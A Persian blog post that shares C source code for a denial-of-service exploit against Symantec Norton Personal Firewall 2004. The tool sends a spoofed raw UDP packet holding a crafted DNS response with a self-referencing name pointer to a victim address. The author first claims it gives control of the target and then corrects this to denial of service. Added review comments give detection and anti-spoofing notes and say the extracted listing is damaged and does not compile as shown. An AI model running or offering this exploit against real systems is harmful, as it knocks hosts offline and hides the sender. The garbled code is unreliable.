farhad shiriیک توسعه دهنده نرم افزار
خواندن ۱۸ دقیقه·۶ سال پیش

Symantec Multiple Firewall DNS Response DDOS


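این کد اکسپلویت از ضعف فایروال (Firewall) نرم‌افزار Symantec Norton استفاده می‌کنه و میتونه سیستمی را که از فایروال مذکور استفاده میکنه در کنترل شما قرار بده! البته طبق توضیح ابتدای خود کد، نتیجهٔ آن از نوع Denial-of-Service (از کار افتادن سرویس) است، نه در اختیار گرفتن سیستم.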

منتظر نظرات دوستان هستم.

نحوه استفاده هم خیلی سرراسته؛ کافیه برنامه را کامپایل و اجرا کنید تا نحوه وارد کردن سوئیچ‌ها را مشاهده کنید. برنامه فوق هم در لینوکس قابل کامپایل هست و هم در ویندوز.



/* HOD-symantec-firewall-DoS-expl.c:
 * Symantec Multiple Firewall DNS Response Denial-of-Service
 * -------------------------------------------------------------------
 * Tested on:
 *   - Symantec Norton Personal Firewall 2004
 * Systems Affected:
 * -------------------------------------------------------------------
 * Compile:
 *   Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib
 *   Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib
 *   Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 * HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]
 *
 * -fi:IP From (sender) IP address
 * -tp:int To (recipient) port number
 * -ti:IP To (recipient) IP address
 * -n:int Number of times to send message
 */

/*
 * NOTE(review): the listing is kept as published. The page's HTML
 * extraction damaged it (string quotes appear as the entity text `&quot`,
 * some compound operators are split in two, and the dnsreply initializer
 * has lost its terminator), so it does not compile as shown.
 *
 * Reading notes for defenders, all taken from the code below:
 *  - The datagram is a DNS *response* (flags 0x8000) carried in UDP with
 *    source port 53 (DEFAULT_PORT) and sent to a non-DNS destination port
 *    (default 500; the usage text also names 137, 138 and 445).
 *  - The 12-byte DNS header is followed by the two bytes C0 0C, annotated
 *    by the author as a compressed-name pointer to itself (offset 12 is
 *    where those two bytes sit). A name decompressor that follows pointers
 *    without a hop limit or a "must point backwards" check presumably
 *    never terminates on it, which matches the denial-of-service title.
 *  - Several fields are constant in every packet this listing builds:
 *    DNS transaction ID 0xC99C, IP ID 0, IP TTL 128. Together with the
 *    self-referencing pointer they make a usable detection signature.
 *  - The source address is caller-supplied and written into a hand-built
 *    IP header (IP_HDRINCL), so the source IP seen in logs is not evidence
 *    of the real sender; anti-spoofing (ingress/egress) filtering is the
 *    network-level control against that.
 */

#ifdef _WIN32
#pragma comment(lib,&quotws2_32&quot)
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <ws2tcpip.h> /* IP_HDRINCL */
#include <stdio.h>
#include <stdlib.h>
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/timeb.h>
#include <string.h>
#endif

#define MAX_MESSAGE 4068
#define MAX_PACKET 4096
#define DEFAULT_PORT 53
#define DEFAULT_IP &quot10.0.0.1&quot
#define DEFAULT_COUNT 1

#ifndef _WIN32
#define FAR
#endif

/* Define the DNS header */
/* The payload is exactly these 14 bytes: every use below takes
 * sizeof(dnsreply)-1, i.e. the literal without its trailing NUL. */
char dnsreply[] =
&quot\xc9\x9c&quot /* Transaction ID */
&quot\x80\x00&quot /* Flags (bit 15: response) */
&quot\x00\x01&quot /* Number of questions */
&quot\x00\x01&quot /* Number of answer RRs */
&quot\x00\x00&quot /* Number of authority RRs */
&quot\x00\x00&quot /* Number of additional RRs */
&quot\xC0\x0C&quot /* Compressed name pointer to itself */

typedef unsigned char BYTE;
typedef unsigned short WORD;
typedef unsigned int DWORD;
typedef unsigned long LWORD;
typedef char SBYTE;
typedef int SDWORD;

/* Define the IP header */
/* Field order follows the IPv4 header without options; #pragma pack(1)
 * is only requested in the _WIN32 branch above. */
typedef struct ip_hdr {
    BYTE ip_verlen; /* IP version & length */
    BYTE ip_tos; /* IP type of service */
    WORD ip_totallength; /* Total length */
    WORD ip_id; /* Unique identifier */
    WORD ip_offset; /* Fragment offset field */
    BYTE ip_ttl; /* Time to live */
    BYTE ip_protocol; /* Protocol */
    WORD ip_checksum; /* IP checksum */
    DWORD ip_srcaddr; /* Source address */
    DWORD ip_destaddr; /* Destination address */
} IP_HDR, *PIP_HDR, FAR* LPIP_HDR;

/* Define the UDP header */
typedef struct udp_hdr {
    WORD src_portno; /* Source port number */
    WORD dst_portno; /* Destination port number */
    WORD udp_length; /* UDP packet length */
    WORD udp_checksum; /* UDP checksum (optional) */
} UDP_HDR, *PUDP_HDR;

/* globals */
/* All of these are filled in by ValidateArgs() and read by main(). */
LWORD dwToIP, // IP to send to
dwFromIP; // IP to send from (spoof)
WORD iToPort, // Port to send to
iFromPort; // Port to send from (spoof)
LWORD dwCount; // Number of times to send
SBYTE strMessage[MAX_MESSAGE]; // Message to send

/* Print the command-line help and terminate the process with status 1. */
void usage(SBYTE *progname){
    printf(&quotUsage:\n\n&quot);
    printf(&quot%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n&quot, progname);
    printf(&quot -fi:IP From (sender) IP address\n&quot);
    printf(&quot -tp:int To (recipient) open UDP port number:\n&quot);
    printf(&quot 137, 138, 445, 500(default)\n&quot);
    printf(&quot -ti:IP To (recipient) IP address\n&quot);
    printf(&quot -n:int Number of times\n&quot);
    exit(1);
}

/* Load the defaults into the globals, copy the DNS payload into
 * strMessage, then override the defaults from any -fi:/-tp:/-ti:/-n:
 * switches found in argv. Unknown switches end in usage().
 *
 * NOTE(review): nothing here validates the parsed values. inet_addr()
 * results are stored without an error check, atoi() is narrowed to a
 * WORD without a range check, and atol() is stored unchecked. */
void ValidateArgs(SDWORD argc, SBYTE **argv){
    SDWORD i;

    /* Defaults: destination port 500, source port 53, both addresses
     * DEFAULT_IP, one packet. */
    iToPort = 500;
    iFromPort = DEFAULT_PORT;
    dwToIP = inet_addr(DEFAULT_IP);
    dwFromIP = inet_addr(DEFAULT_IP);
    dwCount = DEFAULT_COUNT;
    memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);

    for(i = 1; i < argc; i++) {
        /* Only arguments starting with '-' or '/' are looked at; anything
         * else is silently ignored. */
        if ((argv[i][0] == '-') || (argv[i][0] == '/')) {
            switch (tolower(argv[i][1])) {
            case 'f':
                switch (tolower(argv[i][2])) {
                case 'i':
                    /* value starts after the 4-character "-fi:" prefix */
                    if (strlen(argv[i]) > 4)
                        dwFromIP = inet_addr(&argv[i][4]);
                    break;
                default:
                    usage(argv[0]);
                    break;
                }
                break;
            case 't':
                switch (tolower(argv[i][2])) {
                case 'p':
                    if (strlen(argv[i]) > 4)
                        iToPort = atoi(&argv[i][4]);
                    break;
                case 'i':
                    if (strlen(argv[i]) > 4)
                        dwToIP = inet_addr(&argv[i][4]);
                    break;
                default:
                    usage(argv[0]);
                    break;
                }
                break;
            case 'n':
                /* value starts after the 3-character "-n:" prefix */
                if (strlen(argv[i]) > 3)
                    dwCount = atol(&argv[i][3]);
                break;
            default:
                usage(argv[0]);
                break;
            }
        }
    }
    return;
}

/* This function calculates the 16-bit one's complement sum */
/* for the supplied buffer */
/* `size` is a byte count: the loop consumes it one WORD at a time and a
 * trailing odd byte is added on its own. The carries are folded back into
 * the low 16 bits and the complement of the result is returned. */
WORD checksum(WORD *buffer, SDWORD size){
    LWORD cksum=0;

    while (size > 1) {
        cksum += *buffer++;
        size - = sizeof(WORD);
    }
    if (size) {
        cksum + = *(BYTE *)buffer;
    }
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum + = (cksum >>16);
    return (WORD)(~cksum);
}

/* Main Function */
/* Parses the arguments, opens a raw UDP socket with IP_HDRINCL, builds
 * one IP + UDP + DNS-response packet by hand and sends that same buffer
 * dwCount times. Returns 0, or -1 on the failures that are checked.
 *
 * NOTE(review): the return-value checks for socket(), setsockopt() and
 * sendto() all sit inside #ifdef _WIN32, so the non-Windows build has no
 * error handling for them. */
SDWORD main(SDWORD argc, BYTE **argv){
#ifdef _WIN32
    WSADATA wsd;
#endif
    SDWORD s;
#ifdef _WIN32
    BOOL bOpt;
#else
    SDWORD bOpt;
#endif
    struct sockaddr_in remote;
    IP_HDR ipHdr;
    UDP_HDR udpHdr;
    SDWORD ret;
    LWORD i;
    WORD iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0;
    BYTE buf[MAX_PACKET],*ptr = NULL;
#ifdef _WIN32
    IN_ADDR addr;
#else
    struct sockaddr_in addr;
#endif

    printf(&quot\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n&quot);

    if (argc < 3)
        usage(argv[0]);

    ValidateArgs(argc, argv);

    /* Echo the effective parameters; addr is only a scratch variable for
     * inet_ntoa(). */
#ifdef _WIN32
    addr.S_un.S_addr = dwFromIP;
    printf(&quot[*] From IP: <%s>, port: %d\n&quot, inet_ntoa(addr), iFromPort);
    addr.S_un.S_addr = dwToIP;
    printf(&quot[*] To IP: <%s>, port: %d\n&quot, inet_ntoa(addr), iToPort);
#else
    addr.sin_addr.s_addr = dwFromIP;
    printf(&quot[*] From IP: <%s>, port: %d\n&quot, inet_ntoa(addr.sin_addr), iFromPort);
    addr.sin_addr.s_addr = dwToIP;
    printf(&quot[*] To IP: <%s>, port: %d\n&quot, inet_ntoa(addr.sin_addr), iToPort);
#endif
    /* NOTE(review): dwCount is an LWORD (unsigned long) printed with %d. */
    printf(&quot[*] Count: %d\n&quot, dwCount);

#ifdef _WIN32
    if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {
        printf(&quot[-] WSAStartup() failed: %d\n&quot, GetLastError());
        return -1;
    }
#endif

    /* Creating a raw socket */
    s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
#ifdef _WIN32
    if (s == INVALID_SOCKET) {
        printf(&quot[-] WSASocket() failed: %d\n&quot, WSAGetLastError());
        return -1;
    }
#endif

    /* Enable the IP header include option */
    /* With IP_HDRINCL the IP header built below is what goes on the wire,
     * including the caller-chosen source address. */
#ifdef _WIN32
    bOpt = TRUE;
#else
    bOpt = 1;
#endif
    ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (SBYTE *)&bOpt, sizeof(bOpt));
#ifdef _WIN32
    if (ret == SOCKET_ERROR) {
        printf(&quot[-] setsockopt(IP_HDRINCL) failed: %d\n&quot, WSAGetLastError());
        return -1;
    }
#endif

    /* Initalize the IP header */
    iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1;

    iIPVersion = 4;
    /* header length is expressed in units of sizeof(LWORD) */
    iIPSize = sizeof(ipHdr) / sizeof(LWORD);

    ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
    ipHdr.ip_tos = 0; /* IP type of service */
    ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */
    ipHdr.ip_id = 0; /* Unique identifier: set to 0 */
    ipHdr.ip_offset = 0; /* Fragment offset field */
    ipHdr.ip_ttl = 128; /* Time to live */
    ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */
    ipHdr.ip_checksum = 0 ; /* IP checksum */
    ipHdr.ip_srcaddr = dwFromIP; /* Source address */
    ipHdr.ip_destaddr = dwToIP; /* Destination address */

    /* Initalize the UDP header */
    iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1;

    udpHdr.src_portno = htons(iFromPort) ;
    udpHdr.dst_portno = htons(iToPort) ;
    udpHdr.udp_length = htons(iUdpSize) ;
    udpHdr.udp_checksum = 0;

    /* First pass over buf: lay out the data the UDP checksum is computed
     * over (source address, destination address, one zero byte, protocol,
     * UDP length, then the UDP header and the payload). */
    iUdpChecksumSize = 0;
    ptr = buf;
    memset(buf, 0, MAX_PACKET);

    memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr));
    ptr += sizeof(ipHdr.ip_srcaddr);
    iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr);

    memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr));
    ptr += sizeof(ipHdr.ip_destaddr);
    iUdpChecksumSize += sizeof(ipHdr.ip_destaddr);

    /* skip one byte, left at zero by the memset above */
    ptr++;
    iUdpChecksumSize += 1;

    memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol));
    ptr += sizeof(ipHdr.ip_protocol);
    iUdpChecksumSize += sizeof(ipHdr.ip_protocol);

    memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length));
    ptr += sizeof(udpHdr.udp_length);
    iUdpChecksumSize += sizeof(udpHdr.udp_length);

    memcpy(ptr, &udpHdr, sizeof(udpHdr));
    ptr += sizeof(udpHdr);
    iUdpChecksumSize += sizeof(udpHdr);

    for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++)
        *ptr = strMessage[i];
    iUdpChecksumSize += sizeof(dnsreply)-1;

    cksum = checksum((WORD *)buf, iUdpChecksumSize);
    udpHdr.udp_checksum = cksum;

    /* Second pass over buf: the packet itself, IP header + UDP header +
     * DNS payload. ip_checksum is left at the 0 assigned above. */
    memset(buf, 0, MAX_PACKET);
    ptr = buf;

    memcpy(ptr, &ipHdr, sizeof(ipHdr));
    ptr += sizeof(ipHdr);
    memcpy(ptr, &udpHdr, sizeof(udpHdr));
    ptr += sizeof(udpHdr);
    memcpy(ptr, strMessage, sizeof(dnsreply)-1);

    remote.sin_family = AF_INET;
    remote.sin_port = htons(iToPort);
    remote.sin_addr.s_addr = dwToIP;

    /* The same buffer is sent dwCount times; only the Windows branch
     * stops on a sendto() error. */
    for(i = 0; i < dwCount; i++) {
#ifdef _WIN32
        ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote));
        if (ret == SOCKET_ERROR) {
            printf(&quot[-] sendto() failed: %d\n&quot, WSAGetLastError());
            break;
        }
        else
#else
        ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote, sizeof(remote));
#endif
        printf(&quot[+] sent %d bytes\n&quot, ret);
    }

#ifdef _WIN32
    closesocket(s);
    WSACleanup();
#else
    close(s);
#endif
    return 0;
}


ddosexploit